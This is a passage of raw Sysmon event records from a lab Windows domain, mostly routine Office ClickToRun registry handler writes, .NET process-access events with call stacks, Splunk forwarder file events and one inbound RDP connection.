Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" 13241300x800000000000000075303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.BlankDatabaseTemplate.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /NEWDB "%%1" 354300x800000000000000050308Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:39.017{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54788-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050307Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:41.441{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CDCA6D4B23ED4FEFE7C923FB9052A0A,SHA256=70F7D5A012572BC98FF1002A901088DDFE844D3859765DB53DB99930639A6C83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.983{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-2E0D-00000000BB01}2064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\AtWorkRendering\shell\PrintTo\command\(Default)0 13241300x800000000000000075794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.vcs.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /vcal "%%1" 10341000x800000000000000075793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.952{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-2E0D-00000000BB01}2064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.952{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-2E0D-00000000BB01}2064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.vcf.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /v "%%1" 13241300x800000000000000075790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.pst.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /pst "%%1" 13241300x800000000000000075789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.oft.15\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /p "%%1" 13241300x800000000000000075788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.oft.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /t "%%1" 13241300x800000000000000075787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.oft.15\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /t "%%1" 10341000x800000000000000075786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.873{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-2D0D-00000000BB01}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.msg.15\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /p "%%1" 13241300x800000000000000075784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.msg.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "%%1" 10341000x800000000000000075783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.858{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-2D0D-00000000BB01}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.858{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-2D0D-00000000BB01}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.ics.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /ical "%%1" 13241300x800000000000000075780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.hol.15\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /hol "%%1" 13241300x800000000000000075779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.File.eml.15\shell\Open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE /eml "%%1" 13241300x800000000000000075778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.UriLink.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.811{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-2C0D-00000000BB01}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-publisher\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.795{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-2C0D-00000000BB01}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-2C0D-00000000BB01}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000075773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.795{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=896D7CCF5BA5040175662A316B7B649E,SHA256=C9C1B2F9D91E1C6F0E246E81A7448A4271910903A8E186DBA75D9ADBD18439E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000075772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.795{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D43C5EAFBD726854AC2BBE5AD409833,SHA256=E939DE9681345EE2154A5B802E74B926131D3807BABD062E0FC4128000C804F5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\PrintTo\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" /p %%1 *%%2, %%3, %%4 13241300x800000000000000075770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" /p %%1 13241300x800000000000000075769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" /r "%%1" 13241300x800000000000000075768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" /ou "%%u" "%%1" 13241300x800000000000000075767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" /n %%1 13241300x800000000000000075766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Publisher.Document.16\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" %%1 13241300x800000000000000075765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OfficeListShortcut\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE" %%1 10341000x800000000000000075764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.733{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-2B0D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vp "%%1" 10341000x800000000000000075762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.717{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-2B0D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.717{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-2B0D-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\Show\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /s "%%1" 13241300x800000000000000075759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\Print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /p "%%1" 13241300x800000000000000075758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\OpenAsReadOnly\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /h "%%1" 13241300x800000000000000075757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\Open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE "%%1" /ou "%%u" 13241300x800000000000000075756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\New\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE /n "%%1" 13241300x800000000000000075755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\PowerPoint.Slide.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /vu 